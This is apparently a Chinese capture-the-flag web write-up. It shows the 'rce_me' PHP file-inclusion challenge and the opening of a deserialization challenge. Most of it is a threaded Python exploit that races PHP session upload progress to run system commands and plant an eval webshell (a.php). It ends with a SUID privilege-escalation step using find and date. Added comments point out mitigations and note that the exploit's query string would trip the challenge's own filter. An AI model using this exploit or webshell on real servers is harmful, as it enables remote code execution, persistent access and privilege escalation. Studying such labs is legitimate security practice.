web
rce_me
<?php
// Entry point of the rce_me challenge. With no `file` query parameter the
// script prints its own source (highlight_file); otherwise the raw value of
// $_GET["file"] is kept for the include further down. The assignment lives in
// the ternary's else-branch, so $file is never assigned on the first path.
(empty($_GET["file"])) ? highlight_file(__FILE__) : $file=$_GET["file"];
/**
 * Denylist check over a raw string (the caller passes $_SERVER["QUERY_STRING"]).
 *
 * Returns false when any denied substring occurs in $var, matched
 * case-insensitively via stristr, and true otherwise. This is a denylist,
 * not a validation of the include target: any path that avoids these
 * substrings is accepted, so it does not by itself stop inclusion of
 * arbitrary readable files. An allowlist of permitted include targets is
 * the robust control.
 *
 * @param string $var raw text to scan
 */
function fliter($var): bool
{
    // Substrings that cause rejection; their order does not affect the result.
    $denied = ["<","?","$","[","]",";","eval",">","@","_","create","install","pear"];
    $hits = array_filter($denied, function (string $needle) use ($var): bool {
        // stristr yields the matched tail (truthy) or false when absent.
        return (bool) stristr($var, $needle);
    });
    return count($hits) === 0;
}
// The denylist is applied to $_SERVER["QUERY_STRING"] only; request bodies,
// cookies and uploaded files are never checked. `include $file` with a
// request-controlled path is a file-inclusion sink, so anything the server
// process can read (including files it writes itself) becomes includable.
// The durable fix is to resolve $file against a fixed allowlist of include
// targets rather than to extend the denylist.
if(fliter($_SERVER["QUERY_STRING"]))
{
include $file;
}
else
{
die("Noooo0");
}
获取webshell,题目中过滤了很多字符,但是可以利用echo写shell,参考链接
https://blog.csdn.net/chizhaji/article/details/113521985?spm=1001.2101.3001.6661.1&utm_medium=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-1-113521985-blog-111184583.pc_relevant_multi_platform_whitelistv4&depth_1-utm_source=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-1-113521985-blog-111184583.pc_relevant_multi_platform_whitelistv4&utm_relevant_index=1
发现需要同时发包,利用脚本也可以直接发包
# coding=utf-8
import io
import requests
import threading
# Fixed session id reused by every request below; read() assumes the server
# keeps the matching session file at /tmp/sess_<sessid>.
sessid = 'flag'
# POST body sent along with the include request; `cmd` is the key the injected
# `eval($_POST[cmd])` in write() reads. Runtime strings are the writeup's own.
data = {
"cmd": "system('cat f*');"}
# Challenge instance this writeup was run against (page-specific value).
url = "http://80.endpoint-9588ad86d7e34833b12f992204ec90da.dasc.buuoj.cn:81/"
def write(session):
# Loops forever: there is no exit condition, so the thread only stops when the
# process does (the writeup notes the script errors out after roughly 10 s).
# Every iteration sends a multipart upload carrying the
# PHP_SESSION_UPLOAD_PROGRESS form field. With PHP's session.upload_progress
# feature enabled, the server records the upload's progress -- including this
# field's value and the uploaded filename -- in the session file for the
# PHPSESSID cookie while the upload is in flight. The field value here is PHP
# code that, once evaluated, also writes a.php into the working directory.
# Mitigation: session.upload_progress.enabled=0 where the feature is unused,
# and never include() a request-controlled path. Detection: multipart requests
# whose progress field contains '<?php', and unexpected files such as a.php
# appearing in the document root.
while True:
# ~50 KiB body; presumably sized so the upload stays in progress long enough
# for a concurrent read() request to observe the session file -- TODO confirm.
f = io.BytesIO(b'a' * 1024 * 50)
# The response is never inspected; resp is unused.
resp = session.post(url,
data={
"PHP_SESSION_UPLOAD_PROGRESS":"<?php eval($_POST[cmd]);fputs(fopen('a.php','w'),'<?php @eval($_POST[wa1ki0g])?>');?>"},
files={
'file': ('tgao.txt', f)}, cookies={
'PHPSESSID': sessid})
def read(session):
# Also loops forever; event.clear() below does not stop this thread or the
# write() threads, because no thread ever waits on the event.
while True:
# Requests the challenge with file=/tmp/sess_<sessid>, i.e. asks the include
# sink to load the session file while an upload is in flight.
# NOTE(review): this query string contains '_', which the rce_me filter above
# lists among its denied substrings; as pasted, the request would be answered
# with "Noooo0". The writeup does not say how this was reconciled.
resp = session.post(url+'?file=/tmp/sess_' + sessid,
data=data)
# 'tgao.txt' is the uploaded filename from write(); its presence in the
# response is taken as proof that the session file was included.
if 'tgao.txt' in resp.text:
print(resp.text)
event.clear()
else:
pass
if __name__ == "__main__":
# Module-level Event read by read(); it is set once here and cleared on a hit,
# but nothing waits on it, so it has no effect on control flow.
event = threading.Event()
with requests.session() as session:
# Starts 29 writer and 29 reader threads (range(1, 30)) sharing one Session.
# Thread.start() does not block, so the `with` block exits right away and
# closes the session while the threads are still using it -- plausibly related
# to the errors the writeup reports after ~10 s; TODO confirm.
for i in range(1, 30):
threading.Thread(target=write, args=(session,)).start()
for i in range(1, 30):
threading.Thread(target=read, args=(session,)).start()
event.set()
脚本会响应10秒左右报错。但是shell上传成功
读取不到flag,需要提权
内核是Linux,考虑suid提权
find / -perm -u=s -type f 2>/dev/null
利用date来提权
获取flag
step_by_step-v3
<?php
// Disables all error reporting for the request. In this file that hides the
// Errors the magic methods below would otherwise surface (for example calling
// magic() on a null $y1), which makes the gadget class harder to observe or log.
error_reporting(0);
class yang
{
public $y1;
/**
 * Delegates straight to $y1->magic().
 *
 * $y1 is never assigned here and has no default beyond null, so a plain
 * `new yang()` dereferences null and throws an Error. unserialize() does not
 * run constructors, so this body is not part of any object built that way.
 */
public function __construct()
{
    $target = $this->y1;
    $target->magic();
}
/**
 * String-conversion hook that invokes whatever $y1 holds as a callable.
 *
 * Method names are case-insensitive, so this lowercase spelling is still the
 * __toString hook: any string cast of a yang instance (echo, comparison,
 * concatenation) calls $y1 -- a function name, closure or [class, method]
 * pair -- with no arguments. Nothing is returned, so on PHP 8 a TypeError
 * follows unless the call itself exits or throws first. This is what makes
 * the class dangerous if it is reachable from unserialize() on untrusted
 * data; mitigate by not unserializing untrusted input (json_decode) or by
 * restricting `allowed_classes` on unserialize().
 */
public function __tostring()
{
($this->y1)();
}
public function hint()
{
include_once('hint.php');
if(isset($_GET['file']))
{
$file = $_GET['file']